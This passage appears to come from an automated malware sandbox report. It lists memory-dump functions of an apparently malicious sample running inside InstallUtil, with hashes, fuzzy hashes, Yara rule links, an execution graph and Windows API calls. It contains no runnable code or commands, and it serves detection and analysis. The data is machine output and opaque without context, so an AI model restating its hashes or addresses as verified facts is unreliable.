                                                                                  • Opcode ID: 4ee5a608c9c2ff08231c69dd82c577222d96c890fdcf7e6a281f1454f233581f
                                                                                  • Instruction ID: 9dc882596332cb45c65bc66387655340c737f1418fb6795182604fba1cb2dcf7
                                                                                  • Opcode Fuzzy Hash: 4ee5a608c9c2ff08231c69dd82c577222d96c890fdcf7e6a281f1454f233581f
                                                                                  • Instruction Fuzzy Hash: 40E08C749042089BC754DBA4D54066CFBB4AB45200F1080D9C96863381D7319E02DB50
                                                                                  Function 00C07924 Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e0290f986d014a20bd528207446fd410af347d12142259a5e36f030b94bc77b
                                                                                  • Instruction ID: 2a82d0608602c295a7f3abb9612a3655e9ce083abc6146cb019b253a49859763
                                                                                  • Opcode Fuzzy Hash: 1e0290f986d014a20bd528207446fd410af347d12142259a5e36f030b94bc77b
                                                                                  • Instruction Fuzzy Hash: EFD05B35908148CFD704DB94C96865D7772E749306F1082459507AB3C9CB786D05C751
                                                                                  Function 070FE3A0 Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f0cc32b55f84bbba61c644457264d5ddea215926135ddd3db6bccc26b732d1cf
                                                                                  • Instruction ID: ff08e8a6508af88d6e8e31fbfaa1de5a964bc09921057fdfe6e7c0e84053c14c
                                                                                  • Opcode Fuzzy Hash: f0cc32b55f84bbba61c644457264d5ddea215926135ddd3db6bccc26b732d1cf
                                                                                  • Instruction Fuzzy Hash: DFC02BF004B30DC7D26013D0F40C33832DCA743B05F403640C30E008F207700401C659
                                                                                  Function 00AD0840 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 47e47babde8e9d3ebdda8d2599c88ae319eab3022fcb3247b410e6bee9631d08
                                                                                  • Instruction ID: ee2bc5c29d169dbd927cb5dc8ae5253bbdeb86a8ed5853ff8a07967f80413a85
                                                                                  • Opcode Fuzzy Hash: 47e47babde8e9d3ebdda8d2599c88ae319eab3022fcb3247b410e6bee9631d08
                                                                                  • Instruction Fuzzy Hash: F3C09B3000438655D3159F74EC0D7D2FF5C7701224F58C2D9E14C1884347756455D2D7
                                                                                  Function 00C087A7 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4008ca20c1bc2221d62552255d83d364bfd38099b43bfd341c4f53b4681f9edb
                                                                                  • Instruction ID: da75a6555e7af519246139477925884e207aed4861d5ece7a30125205da5c975
                                                                                  • Opcode Fuzzy Hash: 4008ca20c1bc2221d62552255d83d364bfd38099b43bfd341c4f53b4681f9edb
                                                                                  • Instruction Fuzzy Hash: C0D0C974A0922D8BCF20DF31C90479DBAB1AB08300F20C1D9945CA3345E6300E85DF41
                                                                                  Function 00AD0850 Relevance: .0, Instructions: 5COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 913ebd0e8876c4e90197aaf89e237786620e6646aaa51d24ccec335b99049668
                                                                                  • Instruction ID: 8d8b85bf8f9e985b470e5ddb2d3eed9dccba205f791ffb6d11939d76ddff7a91
                                                                                  • Opcode Fuzzy Hash: 913ebd0e8876c4e90197aaf89e237786620e6646aaa51d24ccec335b99049668
                                                                                  • Instruction Fuzzy Hash: 9590023104461D8B56406BD57809655B75C95446157804051A60D415125B66A8154695

                                                                                  Non-executed Functions

                                                                                  Function 00ADF220 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: w6o
                                                                                  • API String ID: 0-2338666966
                                                                                  • Opcode ID: b52bec93b80bd17a887e92f8f56735f8aa416de6239c16745dc9956dbbed958c
                                                                                  • Instruction ID: 7b082d668a204ace967f9f16e7446e0f8501c032f562b1fab469d4fa92fc6e18
                                                                                  • Opcode Fuzzy Hash: b52bec93b80bd17a887e92f8f56735f8aa416de6239c16745dc9956dbbed958c
                                                                                  • Instruction Fuzzy Hash: E912A671E006589FDB14CFAAC98069EFBF2BF88304F24C16AD459AB319D734A946CF54
                                                                                  Function 00C04670 Relevance: .3, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cade6d160c8856825598ac9cdd6bed5eab2d8616e445bb29f8e0172f6936deb0
                                                                                  • Instruction ID: 7a4b3a2d434b7f6b48f8897aa57740e50095c2eaf3bcd0df63d3cd025c6fe57c
                                                                                  • Opcode Fuzzy Hash: cade6d160c8856825598ac9cdd6bed5eab2d8616e445bb29f8e0172f6936deb0
                                                                                  • Instruction Fuzzy Hash: 92B126B4E05218CFDB18CFA9D854BEEBBF2FB4A304F20916AD509AB285D7345985CF01
                                                                                  Function 00C04660 Relevance: .3, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4dd93c08249ceeec9ca9e069eff993efb4c62a9f1644e63ac6c4a2e0e59fe09f
                                                                                  • Instruction ID: 27a1f3174fc47d1ca3c9fe4571fc53232626bbff4a92eaa3c3df084152bb5f51
                                                                                  • Opcode Fuzzy Hash: 4dd93c08249ceeec9ca9e069eff993efb4c62a9f1644e63ac6c4a2e0e59fe09f
                                                                                  • Instruction Fuzzy Hash: 38B126B4E05218CFDB18CFA9D854B9EBBF2FB4A304F20916AD509AB294DB345985CF01
                                                                                  Function 00ADDE58 Relevance: .2, Instructions: 172COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8860b016144f843eb9968f2fd15275aa047c2ed17e495c39c024ca1a750439e0
                                                                                  • Instruction ID: cd68dc7e3c43576410fcea7813410d873a78eb7f828702b0a3c611ff6b6fefd4
                                                                                  • Opcode Fuzzy Hash: 8860b016144f843eb9968f2fd15275aa047c2ed17e495c39c024ca1a750439e0
                                                                                  • Instruction Fuzzy Hash: DD711C71E012098FDB08EF6AE94169ABBF3FF89300F04E139E5099B269DB705946CB50
                                                                                  Function 00ADDE68 Relevance: .2, Instructions: 165COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 605fca1f3ae5cfca95fb86a2bfb88ff7940a1c51322a5de7ed9edfd65b6968a5
                                                                                  • Instruction ID: 29c58be45e792885c20e6900ef9dcc92d32efdb290c88fbe9dda961d8bcd2ef5
                                                                                  • Opcode Fuzzy Hash: 605fca1f3ae5cfca95fb86a2bfb88ff7940a1c51322a5de7ed9edfd65b6968a5
                                                                                  • Instruction Fuzzy Hash: A271FC71E012498FDB48EF6AE94169ABBF3FF89300F14E139E5099B269DF705946CB40
                                                                                  Function 00ADF210 Relevance: .1, Instructions: 125COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aef3420e8120663506804ef4c18df6425d0330b41e70a1d9fc3a73522dcf14e6
                                                                                  • Instruction ID: 4bb641875fab32fe41b274d41cefe39c9b93633544ba685bee2a55b40b469cc2
                                                                                  • Opcode Fuzzy Hash: aef3420e8120663506804ef4c18df6425d0330b41e70a1d9fc3a73522dcf14e6
                                                                                  • Instruction Fuzzy Hash: 114165B2E016198BDB18CFABD94059EFBF3AFC8300F14C17AD958AB264DB3059468B54
                                                                                  Function 070E0006 Relevance: .1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4bc5df2f5f48550fd1ec9c90bbc820e312c8e0187e510963a88dba3fddbbd24b
                                                                                  • Instruction ID: c2972641601f58743c6d0737eb008140d77cbefb67a0cc02dec445bbe4da0854
                                                                                  • Opcode Fuzzy Hash: 4bc5df2f5f48550fd1ec9c90bbc820e312c8e0187e510963a88dba3fddbbd24b
                                                                                  • Instruction Fuzzy Hash: EB417FB18093949FDB26CF25DC487D5BFB6EF86310F1580EBE4846A116C7360A85DF52
                                                                                  Function 070E0040 Relevance: .1, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 645b440d213755a264ab25ac0071961dbbebad788a058df6398ec0fdad0e292a
                                                                                  • Instruction ID: 1378db48f7ab7b0ca5997815c5f01dcfb417eaa78d4954c7917c7f8513a3ca3e
                                                                                  • Opcode Fuzzy Hash: 645b440d213755a264ab25ac0071961dbbebad788a058df6398ec0fdad0e292a
                                                                                  • Instruction Fuzzy Hash: 9331E9B1D05629CFEB28CF6AC84879AF6F6BF88300F14C1EAD51CA6254E7740A858F11

                                                                                  Execution Graph

                                                                                  Execution Coverage:8.4%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:106
                                                                                  Total number of Limit Nodes:12
                                                                                  execution_graph 13638 2936540 13639 2936586 13638->13639 13643 2936713 13639->13643 13647 2936720 13639->13647 13640 2936673 13644 2936720 13643->13644 13650 293611c 13644->13650 13648 293611c DuplicateHandle 13647->13648 13649 293674e 13648->13649 13649->13640 13651 2936788 DuplicateHandle 13650->13651 13652 293674e 13651->13652 13652->13640 13653 2934668 13654 2934676 13653->13654 13659 2936de3 13654->13659 13657 2934704 13660 2936e05 13659->13660 13668 2936ef0 13660->13668 13672 2936ee0 13660->13672 13661 29346e9 13664 293421c 13661->13664 13665 2934227 13664->13665 13680 293851c 13665->13680 13667 2938806 13667->13657 13670 2936f17 13668->13670 13669 2936ff4 13669->13669 13670->13669 13676 29363d4 13670->13676 13674 2936f17 13672->13674 13673 2936ff4 13674->13673 13675 29363d4 CreateActCtxA 13674->13675 13675->13673 13677 2937370 CreateActCtxA 13676->13677 13679 2937433 13677->13679 13679->13679 13681 2938527 13680->13681 13684 293853c 13681->13684 13683 29388dd 13683->13667 13685 2938547 13684->13685 13688 293856c 13685->13688 13687 29389ba 13687->13683 13689 2938577 13688->13689 13692 293859c 13689->13692 13691 2938aad 13691->13687 13693 29385a7 13692->13693 13695 2939e8b 13693->13695 13699 293bed9 13693->13699 13694 2939ec9 13694->13691 13695->13694 13703 293df70 13695->13703 13708 293df60 13695->13708 13714 293bf10 13699->13714 13718 293bf00 13699->13718 13700 293beee 13700->13695 13704 293df91 13703->13704 13705 293dfb5 13704->13705 13753 293e120 13704->13753 13757 293e0dd 13704->13757 13705->13694 13709 293df32 13708->13709 13710 293df6a 13708->13710 13709->13694 13711 293dfb5 13710->13711 13712 293e120 4 API calls 13710->13712 13713 293e0dd 4 API calls 13710->13713 13711->13694 13712->13711 13713->13711 13723 293bff7 13714->13723 13733 293c008 13714->13733 13715 293bf1f 13715->13700 13719 293bf10 13718->13719 13721 293bff7 2 API calls 13719->13721 13722 293c008 2 API calls 13719->13722 13720 293bf1f 13720->13700 13721->13720 13722->13720 13724 293c019 13723->13724 13727 293c03c 13723->13727 13743 293b35c 13724->13743 13727->13715 13728 293c240 GetModuleHandleW 13730 293c26d 13728->13730 13729 293c034 13729->13727 13729->13728 13730->13715 13734 293c019 13733->13734 13737 293c03c 13733->13737 13735 293b35c GetModuleHandleW 13734->13735 13736 293c024 13735->13736 13736->13737 13741 293c290 GetModuleHandleW 13736->13741 13742 293c2a0 GetModuleHandleW 13736->13742 13737->13715 13738 293c240 GetModuleHandleW 13740 293c26d 13738->13740 13739 293c034 13739->13737 13739->13738 13740->13715 13741->13739 13742->13739 13744 293c1f8 GetModuleHandleW 13743->13744 13746 293c024 13744->13746 13746->13727 13747 293c290 13746->13747 13750 293c2a0 13746->13750 13748 293b35c GetModuleHandleW 13747->13748 13749 293c2b4 13748->13749 13749->13729 13751 293b35c GetModuleHandleW 13750->13751 13752 293c2b4 13750->13752 13751->13752 13752->13729 13754 293e12d 13753->13754 13755 293e166 13754->13755 13762 293c784 13754->13762 13755->13705 13758 293e100 13757->13758 13759 293e080 13757->13759 13760 293e166 13758->13760 13761 293c784 4 API calls 13758->13761 13759->13759 13760->13705 13761->13760 13763 293c78f 13762->13763 13765 293e1d8 13763->13765 13766 293c7b8 13763->13766 13765->13765 13767 293c7c3 13766->13767 13768 293859c 4 API calls 13767->13768 13769 293e247 13768->13769 13772 293e2c0 13769->13772 13770 293e256 13770->13765 13773 293e2ee 13772->13773 13774 293e3ba KiUserCallbackDispatcher 13773->13774 13775 293e3bf 13773->13775 13774->13775

                                                                                  Executed Functions

                                                                                  Function 0293C008 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3373433819.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2930000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: d2a4d7abf2b9bfd1513c4e892a2e5f125ac7f6fb606a258f0eb67c58886ebfc9
                                                                                  • Instruction ID: eb86be75abe80e7409909e2be1ac6ff9dcb3997d914bab7758a18e300a267372
                                                                                  • Opcode Fuzzy Hash: d2a4d7abf2b9bfd1513c4e892a2e5f125ac7f6fb606a258f0eb67c58886ebfc9
                                                                                  • Instruction Fuzzy Hash: 4B714770A00B458FDB25DF6AD44175ABBF5FF88304F008A2ED48AE7A40DB75E846CB91
                                                                                  Function 029363D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 58 29363d4-2937431 CreateActCtxA 61 2937433-2937439 58->61 62 293743a-2937494 58->62 61->62 69 29374a3-29374a7 62->69 70 2937496-2937499 62->70 71 29374a9-29374b5 69->71 72 29374b8 69->72 70->69 71->72 73 29374b9 72->73 73->73
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02937421
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3373433819.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2930000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: de84b22c8636122c1c4b6f8193c37ff2f63f44e6c4af1104cb8fa080b5a455dd
                                                                                  • Instruction ID: 37be03ded4be4e498d2fb34c413be1a5dd54aa614278b5972f0616486eb36ef3
                                                                                  • Opcode Fuzzy Hash: de84b22c8636122c1c4b6f8193c37ff2f63f44e6c4af1104cb8fa080b5a455dd
                                                                                  • Instruction Fuzzy Hash: 7E41D2B0C0071DCBDB25CFA9D8447DEBBB6BF88714F20805AD408AB255EB756945CF90
                                                                                  Function 02937367 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 75 2937367-293736c 76 2937370-2937431 CreateActCtxA 75->76 78 2937433-2937439 76->78 79 293743a-2937494 76->79 78->79 86 29374a3-29374a7 79->86 87 2937496-2937499 79->87 88 29374a9-29374b5 86->88 89 29374b8 86->89 87->86 88->89 90 29374b9 89->90 90->90
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02937421
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3373433819.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2930000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 970febe0e72e00fb5771c9c6d18e1c8f0aa286f839fb8d293a51dfc1213b7cfb
                                                                                  • Instruction ID: 9b4ebc4b21455926df81d8eb36e78195207e34b7f72571c04c000663a7b9b372
                                                                                  • Opcode Fuzzy Hash: 970febe0e72e00fb5771c9c6d18e1c8f0aa286f839fb8d293a51dfc1213b7cfb
                                                                                  • Instruction Fuzzy Hash: 9D41D2B0C0071DCBDB25CFA9C844BDDBBB6BF88314F20805AD408AB255E7756945CF90
                                                                                  Function 0293611C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 92 293611c-293681c DuplicateHandle 94 2936825-2936842 92->94 95 293681e-2936824 92->95 95->94
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0293674E,?,?,?,?,?), ref: 0293680F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3373433819.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2930000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 3cf7a3b8cafcbda37dbaf68c3d34f555949f5f1c95b2ef90a3c7bd30bb465238
                                                                                  • Instruction ID: 94dcab44729617f45475165850f7cc387bc1988bd9c16d8b7f605f9febac447b
                                                                                  • Opcode Fuzzy Hash: 3cf7a3b8cafcbda37dbaf68c3d34f555949f5f1c95b2ef90a3c7bd30bb465238
                                                                                  • Instruction Fuzzy Hash: 0421E3B5900209EFDB10CF9AD984AEEBBF8FB48320F14845AE954A7310D374A950CFA5
                                                                                  Function 02936783 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 98 2936783 99 2936788-293681c DuplicateHandle 98->99 100 2936825-2936842 99->100 101 293681e-2936824 99->101 101->100
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0293674E,?,?,?,?,?), ref: 0293680F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3373433819.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2930000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: f787057f84f52010e21ee7901bc8442357606e7ae1992a9221108db695ff7da5
                                                                                  • Instruction ID: a1f4e1020062f7e6f17207cd36d94bdd9aa36ebda88c73289ec5824a0ceff4cd
                                                                                  • Opcode Fuzzy Hash: f787057f84f52010e21ee7901bc8442357606e7ae1992a9221108db695ff7da5
                                                                                  • Instruction Fuzzy Hash: 9A21E4B5900209EFDB10CF9AD984ADEBFF8FB48320F14841AE914A3310D374A950CFA5
                                                                                  Function 0293B35C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 104 293b35c-293c238 106 293c240-293c26b GetModuleHandleW 104->106 107 293c23a-293c23d 104->107 108 293c274-293c288 106->108 109 293c26d-293c273 106->109 107->106 109->108
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0293C024), ref: 0293C25E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3373433819.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2930000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: e17b5d5ffad95a3ea0fa22debf139566e0e8bd1e779a9711b3f8211c08691d12
                                                                                  • Instruction ID: d6170b8ebb0479c3532c505befb0965139ae3794f7abf02c509ebadb0a3d1541
                                                                                  • Opcode Fuzzy Hash: e17b5d5ffad95a3ea0fa22debf139566e0e8bd1e779a9711b3f8211c08691d12
                                                                                  • Instruction Fuzzy Hash: E0112DB68006098BDB10CF9AC444B9EFBF8EB88724F10846AD828B7200C379A545CFA5
                                                                                  Function 00DFD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3372212102.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_dfd000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a39827e5bacd94256dc01034df96e8863e5bba6df99d658d0e1ae2dcbf18d1f8
                                                                                  • Instruction ID: bd616979bdf31199a1f7a49e2952c0982cf5e62835ff30b5899324ed9e372322
                                                                                  • Opcode Fuzzy Hash: a39827e5bacd94256dc01034df96e8863e5bba6df99d658d0e1ae2dcbf18d1f8
                                                                                  • Instruction Fuzzy Hash: 11210371504208DFDB04DF14D9C0B26BB67FB98318F24C56DEA090B356C336D856DAB2
                                                                                  Function 00E0D01C Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3372283414.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_e0d000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d8033707115505481acb1b3b3a3ac389da00c36ceaaca8c54665ccb15b6e968f
                                                                                  • Instruction ID: 27d41eeffcbc8c89f1d3de57895dd9f61b8ee5f428ae78c54736e8c0b83dfbbd
                                                                                  • Opcode Fuzzy Hash: d8033707115505481acb1b3b3a3ac389da00c36ceaaca8c54665ccb15b6e968f
                                                                                  • Instruction Fuzzy Hash: 4421F271608204EFDB14DF54D984B16BB66EB84318F20C56DD94E5B2D6C33AD887CB61
                                                                                  Function 00E0D005 Relevance: .1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3372283414.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_e0d000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 31d87957a921fca2b9a2ed47450c20d7ec2a5f06157dcf3d762d9081976c96bd
                                                                                  • Instruction ID: d80aef559d19ca89ac33dff60adb0a3ec023ac5b56a1ae2a5f25df85069c86a8
                                                                                  • Opcode Fuzzy Hash: 31d87957a921fca2b9a2ed47450c20d7ec2a5f06157dcf3d762d9081976c96bd
                                                                                  • Instruction Fuzzy Hash: 3321537550D3808FC712CF64D994715BF71EB46314F28C5DAD8498F6A7C33A984ACB62
                                                                                  Function 00DFD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3372212102.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_dfd000_InstallUtil.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                  • Instruction ID: b1ceb1329e130ff494cac016a570d271eb9dd5fcf8ba41653597d24e6782a19e
                                                                                  • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                  • Instruction Fuzzy Hash: 3411D376504244CFCB15CF10D5C4B26BF72FB95318F28C6A9D9090B356C33AD856CBA2